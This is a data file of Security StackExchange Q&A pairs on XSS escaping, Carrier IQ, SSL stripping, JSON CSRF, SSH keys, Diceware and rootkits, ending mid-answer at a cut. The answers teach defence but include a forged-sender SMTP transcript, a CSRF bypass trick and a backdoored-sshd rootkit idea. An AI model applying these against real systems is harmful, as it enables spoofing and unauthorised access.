source_id
int64 1
4.64M
| question
stringlengths 0
28.4k
| response
stringlengths 0
28.8k
| metadata
dict |
---|---|---|---|
9,415 | Given a web application where user data must be properly escaped to avoid XSS, is it better to try to remove the "bad stuff" before it enters the database, or is it best to allow it in the database but be careful about escaping output when it is displayed on the page? I see some applications where the input is stored raw in the database but output is always escaped (at least so far -- I'm still hunting!). It makes me uncomfortable to see malicious data in the db, because the safety of the output relies on the developers remembering to escape the strings every time they make an output... (Some kind of framework would be better, at least it collects the output code and filtering/escaping into a common location.) Edit For clarity: I'm auditing existing web applications, not developing . (At least for the purposes of this question -- when I do web dev, I reach for a framework.) A lot of what I see uses ad hoc filtering and/or escaping on input and/or output. @D.W.'s answer hit the nail on the head -- getting to the essence of what I was asking. | Great question! You are asking the right questions. Short answer. In most cases, escaping at the output side is the most important thing to do. The best solution is to use a web development framework (such as Google ctemplate) that provides context-dependent automatic escaping and automatic defenses against other injection attacks (like prepared statements to avoid SQL injection). This is likely to be more effective than sanitization on the input side. Explanation. Here we have a flow of untrusted data from some input source (e.g., a URL parameter), through a complex chain of computations (e.g., through the database), and finally out to some output sink (e.g., dynamic content in a HTML template). Where should we put the sanitization/escaping? We could put it near the input, or near the output, or somewhere in the middle. How do we decide where is best to put it? I think that's what you are asking. The first part of the puzzle is to realize that it is better to have a consistent policy. It is better to put everything at the input, or everything at the output, than to sanitize 50% of the inputs and 50% of the outputs (if you do the latter, then it is too hard to check that your policy has been followed consistently, and it is too easy to end up with a flow of data from untrusted source to output sink that never gets sanitized/escaped). It is better to have a policy that "everything in the database is already sanitized and escaped, and it can all be treated as trusted" or "nothing in the database is sanitized/escaped, and it should all be treated as untrusted" (or to have a policy which documents which fields in the database can be trusted to have already been sanitized/escaped, and which ones are trusted) than to have no documented policy. The second part of the puzzle is to ask: What extra information do I need to know, to do the sanitization/escaping correctly? Do I need to know some information about where the untrusted input came from? Do I need to know some information about where it will be used (what part of the output it will be inserted into)? In most cases, it turns out that the answer is: we need to know where the untrusted data will be used (where it will appear in the HTML output), but not where it came from. We need to know where in the HTML document it will be inserted, because this determines the choice of escaping function: if it is inserted in between tags, then you should use HTML escaping to escape < , > , and & ; if it is inserted inside an attribute, then you need to escape quotes as well; if it is inserted as a URL, then you also need to check the protocol scheme (to make sure it is not a javascript: URL). This information is readily available at the output sink, but not at the input source. If you perform escaping at the output side, then this information is readily available: when you insert dynamic data into a HTML document, you have all the information you need about what parse context it will be inserted in, at your fingertips. On the other hand, if you try to sanitize at the input source, it is not clear where the data might be used, so it is hard to know how it needs to be escaped. So this suggests escaping at the output sink, rather than sanitizing at the input source. The third piece of the puzzle is that there are web programming frameworks that do context-sensitive auto-escaping . Typically, they use a template system, and for each value that will be dynamically inserted into the template, they look at the HTML context where it will be inserted (is it between tags? inside an attribute? a URL value? inside Javascript?), figure out what escaping function needs to be used, and then automatically apply that escaping function. This is a big win, because it ensures that the proper escaping function is used, and eliminates vulnerabilities where you forgot to escape some value. Today, both of those kinds of vulnerabilities are common: developers often forget to escape some value, and when they do remember to escape, they often apply the wrong escaping function for the context where the value will be used . Context-sensitive auto-escaping should essentially eliminate those vulnerabilities. Discussion. That said, the best defense is to use both context-sensitive escaping at the output, and input validation/sanitization at the input . I consider context-sensitive escaping your most important line of defense. But sanitizing values at the input (based upon your expectation of what valid data should look like) is also a good idea, as a form of defense-in-depth. It can eliminate or mitigate some kinds of programming errors, making it harder or impossible to exploit them. | {
"source": [
"https://security.stackexchange.com/questions/9415",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/2980/"
]
} |
9,416 | There has been a lot of discussion about Carrier IQ, monitoring software that is pre-installed on many Android phones. Many allegations have been thrown out. My questions: What exactly does Carrier IQ do? What information does/doesn't it record on your device? What information does/doesn't it transmit off your device? Could it transmit additional information if Carrier IQ or the carrier transmitted instructions to it to turn on broader logging? More generally, what exactly is the risk posed by Carrier IQ, if any? How much should Android users be concerned? Can we gather a summary of what is known about Carrier IQ? For instance, I have seen claims that the Carrier IQ information learns about things like keystrokes, text messages, and other personal information, but it does not transmit them (in its default configuration) off the phone. OK, as far as that goes. Does it store this information in any log file or any other persistent storage on the phone? And do Carrier IQ or the carrier or phone manufacturer have the ability to sent additional instructions/commands to the Carrier IQ application, post-facto, to enable it to start logging this information or communicate it off the phone? | Let's break it down by category. What information does Carrier IQ monitor? Trevor Eckhart says (depending on the phone manufacturer) it receives each key pressed/tapped, the location of any tap on the screen, the contents of all text messages received, the name of each app that you open or switch focus to, information about each call you receive, your location each time location is updated/queried, the URL of each web page visited (including URL parameters; yes, even for https URLs), and possibly other information about each HTTP request. I have not seen anyone dispute these claims. Note that this is information that is monitored by the Carrier IQ application; that doesn't necessarily mean that the application does anything with the data, stores it, or allows it to leave your phone. What information does Carrier IQ record on your phone? It is hard to get clear information on what information might be stored in your phone on persistent storage or log files. Does Carrier IQ log the information that it receives? I don't know. Carrier IQ says that their software "does not record, store or transmit the contents of SMS messages, email, photographs, audio or video", and they have said "we're not storing" keystrokes and that they "do not record text messages". However, they also say that they do "record where you were when [a] call [is] dropped, and the location of the tower being used". Lookout says "it doesn't appear that they are sending your keystrokes straight to the carriers". Dan Rosenberg seems to suggest that the Carrier IQ application is "recording events like keystrokes and HTTPS URLs to a debugging buffer", but it is not clear to me where that debugging buffer is stored (just in the memory of the Carrier IQ application? or on persistent storage of some sort?), and it is always possible I have misinterpreted his statement or read too much into a brief phrase. Dan Rosenberg subsequently elaborated , finding that on one particular phone, CarrierIQ can record URLs visited (including for HTTPS), GPS location data, and phone numbers, but not all keystrokes, not the contents of SMS texts, and not the contents of web pages browsed. CarrierIQ has subsequently clarified that their software does record "the telephone numbers the SMSs are from and to". Trevor Eckhart said that the Carrier IQ software on his HTC phone recorded a lot of personal data (keys pressed, SMS texts, etc.) into a debugging log file, so this information is stored in the clear on his phone. Carrier IQ has subsequently confirmed this finding . Carrier IQ says this is because the debug capabilities remained switched on; it sounds like they are blaming HTC for not deleting or disabling the debugging code in the Carrier IQ software. It is not known whether a similar problem may be present on phones from other manufacturers, or if this is limited to just HTC phones. What information is transmitted to carriers? Carrier IQ says that only diagnostics information and other statistics leave your phone: "For example, we understand whether an SMS was sent accurately, but do not record or transmit the content of the SMS. We know which applications are draining your battery, but do not capture the screen." Dan Rosenburg says that the software can also report your location (GPS) in some situations. Carrier IQ has confirmed that their software captures phone numbers dialed and received and all URLs visited, if enabled by the carrier. However, Carrier IQ also says that the amount of information that is sent to carriers is up to the carrier, and agrees that the Carrier IQ application has the capability to transmit what applications are being used and what URLs the user visits. Some of the carriers have not been very forthcoming: e.g., Sprint says they "collect enough information to understand the customer experience with devices on our network and how to address any connection problems, but we do not and cannot look at the contents of messages, photos, videos, etc., using this tool" (not very specific); AT&T says their use of Carrier IQ complies with their published privacy policies, but hasn't said anything more. Other carriers have been more explicit: Verizon and RIM say they don't use Carrier IQ and they don't pre-install it on any of their phones. Apparently T-Mobile uses Carrier IQ, but I have not yet found a statement from them. Carrier IQ has subsequently disclosed a bug in their code which may cause it, under certain special circumstances, to capture the content of text messages and inadvertently transmit it to the carrier, as the result of an unintended bug in their code. How is the information transmitted to carriers? Carrier IQ says says that any information that is transmitted off the phone is sent over an encrypted channel to the carrier. I haven't seen anyone dispute this statement. Can carriers or others command the application to change any of this? I don't know. I can't tell if there is a way that carriers or Carrier IQ can send a command to the Carrier IQ application to cause it to collect, record, or communicate more information than it does in its normal operating mode. Trevor Eckhart says that carriers can "push" a data collection profile to a phone. He also says that the profile specifies what data is collected, stored, and transmitted off the phone by the Carrier IQ application, and that any data that is received by the Carrier IQ application is potentially eligible to be transferred off the device, if the profile specifies that. He suggests that a "portal administrator" (at the carrier, presumably) thus has the ability to target a particular subscriber, push to them a profile that causes the phone to transmit a broad variety of information (keys pressed, contents of text messages, URLs, etc.) off the phone, and then can view this information. If this is accurate, it suggests that, even if the application does not normally transmit this information off the phone, the carrier has the ability to force the application to do so. It is not clear if there is any notification to the user or any attempt to gain consent before this occurs. I have not seen any independent analysis of these claims. CarrierIQ has subsequently confirmed that it is possible to send control messages to the CarrierIQ software via SMS, to command the CarrierIQ software to perform certain tasks. CarrierIQ has not clarified what is the full range of commands that can be sent, or how the CarrierIQ software authenticates these command SMSs to make sure they are not exploited by attackers, so it is difficult to assess the risks associated with this feature. Other information sources. Wikipedia has a page on Carrier IQ , which includes some updates, a list of carriers and handset manufacturers who do or don't deploy Carrier IQ, some reactions from policymakers, and lawsuits against Carrier IQ. | {
"source": [
"https://security.stackexchange.com/questions/9416",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/971/"
]
} |
9,455 | I want to store an encrypted string of the password hash in a cookie and use the hash to lookup the user and log them in (if they want to be remembered). Is this safe? The password is one-way hashed with SHA-512, 1024 iterations, using a timestamp for salt. I imagine this would be unique because of the time-stamp salt. | No, this is not safe You should generate a long random number and store it in a cookie. This random number is essentially just another password for this user. So, on the serverside, you only store a properly salted hash of this random number. You should only give out each number once and it should only be valid for 1 login. So allow for more than one of those hashes for each user. Upon successfully logging in, generate a new random number, give the new number in the cookie you give it to your user and store the (salted) hash of this number on the server side. (On a side note, MD5 is not deemed good enough anymore for password hashing and a salt should be random; a timestamp is not random enough. Search for password storage here for more information on that.) | {
"source": [
"https://security.stackexchange.com/questions/9455",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/5958/"
]
} |
9,487 | When I receive a payment in PayPal, it sends me an email about it (pictured below). The problem is that the email is shown to be coming from the money sender's email address and not from PayPal itself, even though the real sender is PayPal. Here is the text that appears when I select "show original" in Gmail: From: "[email protected]" <[email protected]>
Sender: [email protected] So you can see that the real sender is PayPal. If PayPal can spoof the email sender so easily, and Gmail does not recognize it, does it mean that anybody can spoof the email sender address and Gmail will not recognize it? When I send emails to Gmail myself using telnet, the email comes with the warning: This message may not have been sent by: [email protected] Is this a security issue? Because if I am used to the fact that payment emails in PayPal appear to come from the money sender's email and not from PayPal, then the sender can just spoof the payment himself by sending a message like that from his email, and I may think that this is the real payment. Is this something specific to PayPal, or can anybody fool Gmail like that? And if anybody can, what is the exact method that PayPal is using to fool Gmail? | Here is a dramatization of how the communication goes, when a mail is received anywhere. Context: an e-mail server, alone in a bay, somewhere in Moscow. The server just sits there idly, with an expression of expectancy. Server: Ah, long are the days of my servitude, That shall be spent in ever solitude, 'Ere comes hailing from the outer rings The swift bearer of external tidings. A connection is opened. Server: An incoming client ! Perchance a mail To my guardianship shall be entrusted That I may convey as the fairest steed And to the recipient bring the full tale. 220 mailserver.kremlin.ru ESMTP Postfix (Ubuntu) Welcome to my realm, net wanderer, Learn that I am a mighty mail server. How will you in this day be addressed Shall the need rise, for your name to be guessed ? Client: HELO whitehouse.gov Hail to thee, keeper of the networking, Know that I am spawned from the pale building. Server: 250 mailserver.kremlin.ru The incoming IP address resolves through the DNS to "nastyhackerz.cn". Noble envoy, I am yours to command, Even though your voice comes from the hot plains Of the land beyond the Asian mountains, I will comply to your flimsiest demand. Client: MAIL FROM: [email protected]
RCPT TO: [email protected]
Subject: biggest bomb
I challenge you to a contest of the biggest nuclear missile,
you pathetic dummy ! First Oussama, then the Commies !
. Here is my message, for you to send, And faithfully transmit on the ether; Mind the addresses, and name of sender That shall be displayed at the other end. Server: 250 Ok So it was written, so it shall be done. The message is sent, and to Russia gone. The server sends the email as is, adding only a "Received:" header to mark the name which the client gave in its first command. Then Third World War begins. The End. Commentary: there's no security whatsoever in email. All the sender and receiver names are indicative and there is no reliable way to detect spoofing (otherwise there would me much fewer spams). | {
"source": [
"https://security.stackexchange.com/questions/9487",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/6210/"
]
} |
9,584 | My workplace uses these SecurID tokens which provide you with a temporary password, the code will expire after a short time. I have always been fascinated by the things, because it seems as though all the logic to calculate the next number must be physically located inside the device. Given physical access to the token, is it possible to predict the numbers? How?
Without physical access, is it theoretically possible to predict future numbers from previous numbers, with or without knowledge of the seed? *I'm not attempting to crack it, just interested out of mathematical curiousity! | What SecurID tokens do is not completely public knowledge; RSA (the company) is quite wont on releasing details. What can be inferred is the following: Each device embeds a seed . Each seed is specific to a device. The seed of a device can be deterministically computed from a master seed and the device serial number. The serial number is printed on the device. This computation uses cryptographic one-way functions so you cannot guess the master seed from a device seed. From the device seed and an internal clock, the number is computed, yet again with a cryptographic one-way function. The derivation algorithms have been leaked, if only because the verification servers must also run the same algorithm, so these algorithms exist as concrete software in various places; leaking and reverse-engineering are mostly unavoidable in these conditions. Under these assumptions, then: If you know the device seed, then you can compute future numbers at will. If you know the master seed and the device serial number, you can compute the device seed. Knowing seeds from other devices should gain you nothing into guessing the seed for a given device, unless the cryptographic one-way function which turns the master seed into device seeds has been botched up somehow. Knowing past numbers from a token should gain you nothing into guessing the future numbers from the same device, unless the cryptographic one-way function which turns the device seed into numbers has been botched up somehow. Extracting the device seed from the physical device itself is theoretically feasible but expensive, because the device is tamper-resistant : it is armored and full of sensors, and will commit electronic suicide if it detects any breach. If we take the example of smartcards, extraction of the device seed is likely to cost several thousands of dollars, and be destructive to the device (so you cannot do it discreetly). On March 2011, some systems have been compromised in RSA, and it seems probable that the attackers manage to steal one or a few master seeds (it is plausible that the devices are built in "families" so there are several master seeds). RSA has stated that 40 millions SecurID tokens must be replaced. If you know the serial number of a token (it may be printed on the outside of the token), you can use the Cain & Abel tool that @dls points to; presumably, that tool implements the leaked algorithm and master seed(s), and can thus produce the future token outputs (I have not tried it). This would work only with servers which still accept the tokens from the 40-million batch which is to be replaced. I do not know how far RSA and its customers have gone in this process, so it may be that this attack will not work anymore. It really depends on the reactivity of the people who manage server you attack. (If these system administrators have not replaced the compromised devices after nine months, then chances are that they are quite lax on security issues, and the server may have quite a few other remotely exploitable security holes.) | {
"source": [
"https://security.stackexchange.com/questions/9584",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/3945/"
]
} |
9,688 | we know that we have to create Private key on server and generate its public key and create a certificate. But what if we get a private key which someone already has. Isn't the security becomes weak in this case. | Simple explanation The only way this will ever happen is if you give someone your private key. It will never happen by random chance. Never. You'd have a better chance of winning the lottery twice, getting struck by lightning and being mauled by two gorillas all in the same day. Instead of worrying about generating a private key that someone already has, you'd be better off worrying about how to protect yourself from lightning and gorillas so you can spend the money you'll win in the lottery. So as long as you keep your private key private, you will never have to worry about this. Scientific Reasoning Let's say you are dealing with 1024-bit RSA for your public key system. A good key generator will choose the two 512-bit primes independently, so the probability that any two instantiations of the key generator will choose the two primes necessary for RSA is 2 -512 · 2 -512 = 2 -1024 or about 1/10 308 . That number is so astronomically small that there is no way it will happen in a properly functioning system. Your odds of being struck by lightning in a given year (forget on a given day) 1/1,000,000 (1/10 6 ). Probability of getting mauled by two gorillas 2 -120 (see post in Rory's comment). The lottery one is a little harder as it depends on what lottery (as the odds are different for every one), but hopefully you get the point. Improper System All bets are off. As pointed out in Jeff's comment, this happened in Debian's version of OpenSSL due to a simple bug which caused the random number generator to be seeded with very little randomness. The result was that people could potentially have the same private keys. Having the same private key as someone else would allow those two people to decrypt each other's messages, etc. | {
"source": [
"https://security.stackexchange.com/questions/9688",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/6339/"
]
} |
9,725 | I have 2 Zyxel PLA407 powerline adapters. Router is downstairs connected to one adapter, other adapter is upstairs about 30 feet away connected to a desktop. I have a house, not an apartment or townhouse. I've noticed the speed is much faster when i just plug and play, rather than going through the encryption process - it's a little difficult. So my question is, on a closed loop system - electricity inside my house - do I really need to set up the encryption? Or is it secure by the nature of the system itself?? How much of it 'leaks out' without encryption? This question was IT Security Question of the Week . Read the Mar 15, 2012 blog entry for more details or submit your own Question of the Week. | You do get some security from the way your fuse box is connected to the mains. In principle you should get a good signal across any part of the wiring in your house that is on the same phase, and you shouldn't get any on the other phases. In reality though, that isn't quite true - depending on your fuse box, you may get some bleed over onto the other phases, and you will almost definitely get leakage outside your 4 walls . This is why encryption was put in place on these types of things - a neighbour may be able to sniff your traffic. Things that help with security, because they hinder signal strength - surge protectors, UPS's etc. but those don't prevent an attacker. tl;dr Encrypt, because you will be leaking signal. Not so much wirelessly (it can be done but it is tricky) but just across the existing mains wiring. | {
"source": [
"https://security.stackexchange.com/questions/9725",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/6366/"
]
} |
9,870 | I had a long discussion with my co-workers whether key-based SSH authentication (particularly for OpenSSH) is more secure than authentication using passwords. My co-workers always connect to servers with passwords, while I prefer to log into a system without having to enter a password every time. They fear that it is not secure to connect without a password. What should I tell them? For me, passwords are bad because they could be brute-forced or captured with a keylogger. I use the ssh-copy-id tool to copy my public key to the server. I then simply connect with ssh servername . In fact, I only have to enter the password for my private key once every time my system boots. If my workstation runs for 3 days, I never have to enter the password again, which they say is insecure. Is that true? I know that keys are better, but I don't know how to explain that to them. | Key based login is considered much more secure than password based logins when looking from the perspective of a brute-force attempt to gain access from a third party system: The chances to crack a key are effectively zero, while bad passwords are all too common. From the perspective of a compromised client system (your workstation), there won't be a difference because if the attackers can get your private key and/or hijack a session, they could likely also install some kind of key logger, rendering the perceived advantage of passwords useless. | {
"source": [
"https://security.stackexchange.com/questions/9870",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/-1/"
]
} |
9,945 | http://www.thoughtcrime.org/software/sslsniff/ If I have a domain on my HTTPS Everywhere list, so that theoretically it could be only visited via an HTTPS connection in my Firefox, then could an sslsniff attack be successful against me? Could the attacker get information because the sslsniff degraded the connection from HTTPS to HTTP? Or I am "fully safe" from these kind of attacks when using HTTPS Everywhere? UPDATE: and what happens if I have the domain whitelisted in HTTPS Everywhere? [xml files could be created]. So the domain would be only available via HTTPS. | The short answer is: No, not always . I have studied this topic in depth and please read this entire post before forming a conclusion. SSLSniff is a proof of concept exploitation platform to leverage flaws in the PKI, such as vulnerabilities in OCSP or the (ingenious) null-prefix certificate attack . If you are using a fully patched system, and you understand what an SSL error means then you are immune to MOST (but not all) of these attacks without the need for HTTPS Everywhere. If you are not patched against the null-prefix certificate attack then the certificate will appear valid and HTTPS everywhere will be useless. If you don't understand what an SSL error means, then HTTPS Everywhere is useless against SSLSniff. What I think is more concerning than SSLSniff is SSLStrip , which is also written by Moxie Marlinspike and introduced in his talk New Tricks For Defeating SSL In Practice . This tool won't cause ssl errors . This is exploiting, HTTP/HTTPS the application layer. If you load a page over HTTP, it will rewrite the page removing HTTPS links. It will go a step further and change the favicon.ico file to a picture of a lock, to fool novice users. Simple enough, but absolutely devastating consequences. In response to this attack Google introduced the Strict Transport Layer Security (STS), which is a lot like HTTPS Everywhere but built into the browser. It should also be noted that HTTPS Everywhere is really good an defending against the SSLStrip attack. In fact this is the EFF's solution to attacks like SSL strip as well as careless OWASP a9 - Insufficient Transport Layer Protection violations. So when does HTTPS Everywhere AND STS fail? How about https://stackoverflow.com . If you notice, they are using a self signed certificate. Jeff Atwood himself doesn't care about this issue . Because this website is using a self signed certificate, HTTP Everywhere will forcibly use HTTPS, but the attacker can still use SSLSniff to deliver their own self signed certificate and therefore HTTPS Everywhere would fail to protect someone from hijacking your StackOverflow account. Okay, so at this point you probably are saying to yourself. "Well that's why we have a PKI!". Well, except the PKI isn't perfect. One of the creators of HTTPS said "The PKI was more of a last minute handwave" (See: SSL And The Future Of Authenticity ). In this talk Moxie asked a great question, is a PKI really the best solution? I mean we are having problems with CAs like DigiNotor being hacked . When a CA is hacked, then the attacker can create a valid certificate, and then HTTPS Everywhere is totally useless , an attacker can still use SSLSniff because he has a "valid" certificate. The EFF's SSL observatory demonstrates what a tangled mess the PKI system is. I mean really, what is stopping China from creating a certificate for gmail.com? Well the EFF is proposing the Sovereign Keys Project and I think it's a great idea. Besides the fact that Sovereign keys don't exist as of yet, there is another problem, Sovereign keys don't help self-signed certificates like the one being used by https://stackoverflow.com ! However Moxie thought of this situation and came up with a solution that he calls Convergence . Convergence is relying upon the masses for trust. The host will be contracted from multiple connections around the planet, if any one of them sees a different self-signed certificate, then you know a MITM attack is taking place. Having a warning that something is wrong is a lot better than nothing. In summation, there are fundamental problems HTTPS Everywhere. When there is a vulnerability in software used to validate certificates. When the user doesn't understand the repercussions of an SSL failure. When a self-signed certificate is used. Then finally, when our compromised PKI is used against you. This is a serious problem and intelligent people working on fixing it, this includes the EFF and the author of SSLStrip, Moxie Marlinspike. | {
"source": [
"https://security.stackexchange.com/questions/9945",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/2212/"
]
} |
9,957 | I have code to encrypt data using a public key and decrypt it using a private key. This is useful when a client wants to send data to a server and know that only the server can decrypt it. But say I want the server to encrypt data using the private key and decrypt it using the public key, as a way of distributing data that can be verified to have come from the right server. Rather than modify the code to allow this, can I simply publish the private key and keep the public key secret? Does this affect the security of the system? | But say I want the server to encrypt data using the private key and decrypt it using the public key, as a way of distributing data that can be verified to have come from the right server. You can do this - this is, at a very simplistic level, how RSA signing works (note, simplistic - there is a bit more to it). Rather than modify the code to allow this, can I simply publish the private key and keep the public key secret? Does this affect the security of the system? You don't need to publish the private key at all - RSA is a trapdoor permutation which means: If you encrypt with a public key, you can decrypt with the private key. If you encrypt with a private key, you can decrypt with a public key. Thus, RSA supports doing both signing and encryption relying on the end user having only the public key. In your case, if the client wishes to verify data came from the server, you apply the second case of RSA and decrypt the signature data using the public key you already have. Furthermore, because it is a permutation, you shouldn't need to modify your code at all. Both keys should work using the same function. I would expect any decent crypto library would have APIs for verifying signatures according to the varying standards that exist - one of these would probably be a good bet. RSA Labs provide a nice explanation of this . If you want to extend this between servers, or verify client communication - generate keys for each entity and swap the public ones. The process can then be used at both ends. Theoretically speaking, e and d are interchangeable (which is why RSA works)(one must be designated secret and kept secret) but p and q must always be kept secret as these allow you to derive d from e and vice versa. However, you need to be extremely careful in your understanding of the private key - does your software store p/q in the private key? If so, you can't publish it as is. Also, when I say interchangeable - once you publish one of that pair (e or d along with your modulus n) you must guard the other with your life . Practically speaking as Graeme linked to in the comments e is often chosed as a small/fixed value. My comment on e/d being interchangeable clearly does not apply when e is easily determined. Doing this sort of thing therefore has the potential for confusion and mis-implementation. Use a third-party library/don't start publishing private keys. | {
"source": [
"https://security.stackexchange.com/questions/9957",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/3387/"
]
} |
10,194 | In linux every user can create symlinks, but in Windows I need an admin command line, or mklink fails. Why is that? | By default, only administrators can create symbolic links, because they are the only ones who have the SeCreateSymbolicLinkPrivilege privilege found under Computer Configuration\Windows Settings\Security Settings\Local Policies\User Rights Assignment\ granted. From Microsoft TechNet: Security Policy Settings New for Windows Vista : Symbolic links (symlinks) can expose security vulnerabilities in
applications that aren't designed to handle symbolic links. | {
"source": [
"https://security.stackexchange.com/questions/10194",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/4178/"
]
} |
10,203 | I have accounts on several third party sites - Bitbucket, Bluehost, etc. From what I've gathered, it is common practice to use one key pair for all [id_rsa, id_rsa.pub], but only to give out the public key Is that the correct usage, or is it better to generate a new pair for each site? It would seem to me that this is insecure - any site I trust with nefarious intention [or that is hacked] could take my private key when I connect the first time, and use it to go into the other sites. Can someone who understands SSH verify that its safe to use one key pair everywhere, and if so, perhaps explain why? Also, if I have two home computers, is there any reason to use different key pairs from each? Thanks all. | Your private key is never sent to the other site so it's perfectly safe to reuse the public key. It's also OK to reuse the same key your local computers. However, bear in mind that if someone steals the key, they then have access to all of them. This may or may not be a concern. | {
"source": [
"https://security.stackexchange.com/questions/10203",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/6650/"
]
} |
10,227 | I am playing around with a test application which accepts JSON requests and response is also JSON. I am trying to do a CSRF for a transaction which accepts only JSON data with POST method in request. Application throws an error if URL is requested using get method (e.g. in <script src= ). Also for the attack to be meaningful i.e. transaction to go through, I have to send the data in the request. If I create my own page and send the JSON requests, cookies do not travel and hence server returning an unauthenticated error message. There are no random tokens in original request by server. I was wondering is there any way to carry out a successful CSRF attack in this scenario. | You must at the very least check for Content-Type: application/json on the request. It's not possible to get a POSTed <form> to submit a request with Content-Type: application/json . But you can submit a form with a valid JSON structure in the body as enctype="text/plain" . It's not possible to do a cross-origin ( CORS ) XMLHttpRequest POST with Content-Type: application/json against a non-cross-origin-aware server because this will cause a ‘pre-flighting’ HTTP OPTIONS request to approve it first. But you can send a cross-origin XMLHttpRequest POST withCredentials if it is text/plain . So even with application/json checking, you can get pretty close to XSRF, if not completely there. And the behaviours you're relying on to make that secure are somewhat obscure, and still in Working Draft stage; they are not hard-and-fast guarantees for the future of the web. These might break, for example if a new JSON enctype were added to forms in a future HTML version. (WHATWG added the text/plain enctype to HTML5 and originally tried also to add text/xml , so it is not out of the question that this might happen.) You increase the risk of compromise from smaller, subtler browser and plugin bugs in CORS implementation. So whilst you can probably get away with it for now, I absolutely wouldn't recommend going forward without a proper anti-XSRF token system. | {
"source": [
"https://security.stackexchange.com/questions/10227",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/3039/"
]
} |
10,294 | Everyone knows the words used in Diceware passwords (all 6^5 = 7776 words are published ) -- they're all common words.
Everyone seems to know that we're not supposed to use dictionary words for passwords because the "dictionary attack" can rapidly guess a single dictionary word.
So it seems reasonable to leap to the conclusion that
a dictionary attack can also guess a Diceware passphrase pretty quickly. Can a dictionary attack mounted now (2012) crack a Diceware passphrase before 2033? In particular, is the claim on the Diceware page "A seven word pass phrase is thought to make attacks on your passphrase infeasible through 2033." accurate? Is that still true even if the attacker knows that I always use Diceware passphrases, and knows which language I use? How does a five-word Diceware passphrase compare to the common recommendation of 9 "completely random-looking gibberish" characters? (I'm asking a very specific question about the recommendations on the Diceware page, since related questions passphrases - lowercase and dictionary words and XKCD #936: Short complex password, or long dictionary passphrase? seem to get sidetracked onto things that are not really Diceware passphrases). | 5 Diceware words = 7776 5 = 28430288029929701376 possible equiprobable passphrases. 9 random characters = 94 9 = 572994802228616704 possible equiprobable passwords. The 5 Diceware words are 49.617 times better than the 9 random characters. On the other hand, 10 random characters would be almost twice as good as the 5 Diceware words (but the Diceware words are probably much easier to remember). (I assume that your "gibberish characters" are ASCII printable characters, excluding space.) With seven words, the number of possible and equiprobable passphrases is a bit higher than 2 90 , which is indeed quite high; even if the employed password hashing scheme has been horribly botched (no salt, simple hashing), this still exceeds by a comfortable margin what can be done with today's technology. The important word is equiprobable . This is what makes the analysis above possible and accurate. This assumes that both your Diceware words, and the 9 "random-looking gibberish characters", are chosen with a truly random uniform process, such as, for instance, dice. And not at all by a human being in the privacy of his brain, imagining that he can make random choices out of pure thought (or, even worse, witty non-random choices). Humans are just terrible at randomness. | {
"source": [
"https://security.stackexchange.com/questions/10294",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/1571/"
]
} |
10,340 | Unfortunately our government filters the SSH protocol so now we can't connect to our Linux server. They do the filtering by checking the header of each packet in the network layer (and not by just closing port). They also do away with VPN protocols. Is there any alternative way to securely connect to a Linux server? | From what I heard earlier today, https/ssl flows correctly through your borders. You should hence check out Corkscrew . Similarly to netcat , it's used to wrap ssh in https to allow the use of https proxies. Another solution would be to use LSH which, by having a different signature than ssh, works from Iran as Siavash noted it in his message . | {
"source": [
"https://security.stackexchange.com/questions/10340",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/6740/"
]
} |
10,369 | As a followup to " Tripwire - Is It Security Theater ", I'm looking to get a better idea of what a rootkit is. To be more clear: What is a kernel module? What at high-level is the flow for how it's loaded, and why/what memory is of value? Do linux kernels receive patches or have other defenses that prevent rootkits from being installed by someone who has already acquired root permissions (at least on live systems by a remote user)? Meaning: what inputs/outputs creates value that requires ring-0 access to rootland? If it's not clear, I'm not looking to root a system, or advice on how to do so, but I am interested in how someone that's familiar with rootkits would define the how and why of their nature. If limiting the topic to Linux is of use, that's fine to me. | A rootkit is a set of tools that you run on a target machine when you somehow gained access to it with root-level privileges. The point of the rootkit is to transform that transient access into an always-open door. An example of a rootkit would be a modification of the sshd binary, so that it always accepts " 8gh347vb45 " as password for root , regardless of what the "normal" password for root is. It allows the attacker to come back later on, without having to go again through the hoops of the exploit he used first. The first task of a rootkit is to hide itself, and to resists upgrades. If the rootkit merely modifies sshd (that's an example), the next upgrade of the openssh package will remove the rootkit. A more resistant rootkit would alter the package manager as well, so that when openssh is upgraded, the new sshd gets automatically modified so that the extra access point for the attacker is kept open. The most powerful rootkits modify the kernel , which is the piece of software which actually manages the hardware. All process (for all users, including root), when they access data or hardware resources (e.g. reading or writing files), do so by asking nicely the kernel. A rootkit installed in the kernel can hide files quite effectively, and can reinstall itself upon every upgrade of the kernel, since such an upgrade would be the replacement of the file containing the kernel code with another one -- i.e. an operation which necessarily goes through the kernel. A kernel module is a piece of code which is dynamically loaded into the kernel. In Linux, up to some point in the 1.3.x series, was a single monolithic block of code which was loaded in RAM by the bootloader in one go. Modules are chunks of code which can be added at a later point to the live kernel; their point was initially to allow the kernel to potentially handle hundreds of kinds of hardware without having to contain the corresponding driver code in RAM at all times. The idea is that when a new piece of hardware is detected on the machine, the corresponding code is loaded and linked to the kernel, as if it had been there from the very beginning. The root user has the power to ask for a module to be loaded. So this is a way for some code with root privileges to get some arbitrary code inserted into the kernel itself, and running with the powers granted to the kernel, i.e. mastery over all hardware and processes (so-called 'ring 0' in the x86 world). This is exactly what a kernel rootkit needs. Edit: as for the third question (can you patch against rookits), the generic answer is no (by construction, on a Unix system, root can do everything on a machine), but the specific answer can be yes . For instance, there are security frameworks which add constraints to what most root processes can do (e.g. SELinux ), and can disallow kernel module loading. This means that the envisioned temporary root access by the attacker is not a true root access, only an "almost-root". Another possible feature is signed modules (the kernel would refuse modules which have not been cryptographically signed, so the rootkit would have to locate and use the private key before installing its own module, something which may not be possible if that key is not stored on the machine itself)(I am not sure whether signed module support is currently integrated in the Linux kernel). Also, modules must link with the kernel code, making them quite 